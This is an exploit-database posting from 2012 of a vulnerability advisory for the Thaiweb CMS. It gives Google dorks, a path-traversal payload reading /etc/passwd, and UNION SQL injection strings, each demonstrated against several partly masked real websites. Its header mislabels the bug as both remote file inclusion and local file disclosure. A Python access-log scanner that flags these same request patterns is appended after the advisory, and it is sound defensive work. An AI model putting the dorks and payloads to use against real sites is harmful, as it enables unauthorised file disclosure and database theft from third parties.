Thaiweb <= Remote File Inclusion Vulnerability

2012.12.20
Credit: GoLd_M
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: Thaiweb <= Remote File Inclusion Vulnerability
# Date: 19/12/2012
# Author: GoLd_M (Libyan) Page FaceBook (http://www.facebook.com/pages/337878286310383)
# Category:: Local File Disclosure Vulnerability
# Google Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php
# Ex :[Thaiweb]/index.php?page=../../../../../../../../../../../../../etc/passwd
# Demo:
# 01 :http://giXXX.th/index.php?page=../../../../../../../../../../../../../etc/passwd
# 02 :http://www.keyXXXsin.com/index.php?page=../../../../../../../../../../../../../etc/passwd
# 03 :http://www.reaXXwebthai.com/index.php?page=../../../../../../../../../../../../../etc/passwd
# Google Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php
# Ex :[Thaiweb]/index.php?page=boardque.php&bod_id=4'
# Demo:
# 01 :http://www.keyXXsin.com//index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# 02 :http://wwXXartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# 03 :http://gifXX.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# 1337day.com [2012-12-20]

References:

http://www.facebook.com/pages/337878286310383
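
A defender-side check for the two request patterns this advisory lists, added here as an example (it is not part of the original advisory or of Thaiweb's code): it scans web access-log lines and flags `page` values that are not a bare script name and `bod_id` values that are not plain integers. The log lines, the allowlist patterns and the function names are constructed assumptions based on the legitimate values shown above (`page=board.php`, `bod_id=4`).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed shape of legitimate values, taken from the advisory's own
# examples: page=board.php and bod_id=4. Anything else is reported.
PAGE_OK = re.compile(r"[A-Za-z0-9_-]+\.php")
BOD_ID_OK = re.compile(r"[0-9]+")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return a list of findings for one request target (path plus query)."""
    findings = []
    # parse_qs percent-decodes once; a double-encoded value still contains
    # '%' afterwards, so it fails the allowlist as well.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for value in params.get("page", []):
        if not PAGE_OK.fullmatch(value):
            findings.append("page: not a bare script name")
    for value in params.get("bod_id", []):
        if not BOD_ID_OK.fullmatch(value):
            findings.append("bod_id: not an integer")
    return findings

def scan(lines):
    """Return (line_number, findings) for every log line that is flagged."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        found = check_request(m.group(1)) if m else []
        if found:
            hits.append((n, found))
    return hits

# Constructed sample lines in combined log format (documentation addresses).
SAMPLE = [
    '198.51.100.7 - - [20/Dec/2012:10:00:01 +0700] "GET /index.php?page=board.php HTTP/1.1" 200 5120',
    '198.51.100.9 - - [20/Dec/2012:10:00:05 +0700] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.9 - - [20/Dec/2012:10:00:06 +0700] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [20/Dec/2012:10:00:09 +0700] "GET /index.php?page=boardque.php&bod_id=4 HTTP/1.1" 200 7311',
    '198.51.100.9 - - [20/Dec/2012:10:00:12 +0700] "GET /index.php?page=boardque.php&bod_id=-4+union+select+1,2,3-- HTTP/1.1" 200 7290',
    '198.51.100.9 - - [20/Dec/2012:10:00:13 +0700] "GET /index.php?page=boardque.php&bod_id=4%27 HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for n, found in scan(SAMPLE):
        print(f"line {n}: {'; '.join(found)}")
```

The same allowlist shape (a fixed set of script names for `page`, an integer cast and a parameterized query for `bod_id`) is what the application-side fix would enforce before the value reaches an include or a SQL statement.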



Copyright 2024, cxsecurity.com

 
